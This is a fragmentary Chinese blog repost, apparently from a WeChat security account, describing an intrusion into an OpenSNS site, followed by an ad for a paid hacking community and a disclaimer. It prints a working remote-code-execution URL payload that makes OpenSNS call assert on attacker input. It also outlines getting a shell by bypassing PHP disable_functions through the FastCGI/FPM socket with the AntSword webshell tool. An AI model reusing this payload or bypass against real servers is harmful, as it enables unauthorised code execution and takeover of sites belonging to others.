关于OpenSNS的漏洞
前台RCE
index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id[0]=jiang
后台文件上传
后台RCE
后台任意文件下载
信息搜集
disable_func
和 open_basedir
的fpm/fastcgi
GETSHELL
/tmp/php-cgi-56.sock
127.0.0.1:9000
或者 0.0.0.0:9000
unix://
套接字的方式依然可行。可以直接用蚁剑fsockopen
这个函数去请求,可以参照newsctf中的一个题目,修改fpm.sock的地址就好。然后打开终端,发现命令可以执行了。
参考
https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/5
https://xz.aliyun.com/t/9936
很简单为了恰饭哈哈哈,然后也是为了建立一个圈子进行交流学习和共享资源嘛
相应的也收取费用嘛,毕竟维持星球也需要精力
群里面联系群主是可以要一些免费的学习资料的,因为群里面大部分是大学生嘛
大学生不就是喜欢白嫖,所以大家会共享一些资料
没有的群主wk也有,wk除了不会pc,其他都能嫖hhh
1.刀客源码的高级会员
2.FOFA在线查询与下载,key使用、360quake、shodan等
3.专属漏洞库
5.专属内部it免费课程
6.不定期直播分享(星球有录屏)
原文始发于微信公众号(湘安无事):记一次简单站点的渗透过程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论